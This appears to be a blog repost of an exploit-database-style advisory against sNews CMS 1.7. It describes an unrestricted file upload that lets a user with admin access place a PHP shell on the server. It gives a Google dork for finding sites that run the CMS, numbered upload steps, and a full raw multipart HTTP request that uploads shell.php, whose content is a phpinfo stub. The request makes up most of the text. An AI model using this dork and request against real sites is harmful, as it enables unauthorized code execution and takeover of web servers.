Rabu, 30 November 2016
# Exploit Title : Snews CMS upload sheller# Author : Ashiyane Digital Security Team# Google Dork : "This site is powered by sNews"# Date : 04/11/2016# Type : webapps# Platform : PHP# Vendor Homepage : http://snewscms.com/# Software link : http://snewscms.com/download/snews1.7.1.zip# Version : 1.7(latest)#######################################################3need admin access for upload files but we can upload any file withoutbypass(.php,.exe,....)1-goto http://SiteName/snews_files/2- click on Browse botton and select you`re file3- click on uploadsheller path is :http://SiteName/shell.phppoc url:http://localhost/snews_files/Poc header:Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://localhost/snews_files/Cookie: PHPSESSID=am9ffv1sg2kjkfnaku69tfgsu5Connection: keep-aliveUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data;boundary=---------------------------92741037415004Content-Length: 665-----------------------------92741037415004\r\nContent-Disposition: form-data; name="upload_dir"\r\n\r\n.\r\n-----------------------------92741037415004\r\nContent-Disposition: form-data; name="imagefile"; filename="shell.php"\r\nContent-Type: application/\r\n\r\n<?php phpinfo ?><br>\r\n-----------------------------92741037415004\r\nContent-Disposition: form-data; name="ip"\r\n\r\n127.0.0.1\r\n-----------------------------92741037415004\r\nContent-Disposition: form-data; name="time"\r\n\r\n1478199661\r\n-----------------------------92741037415004\r\nContent-Disposition: form-data; name="upload"\r\n\r\nUpload\r\n-----------------------------92741037415004--\r\n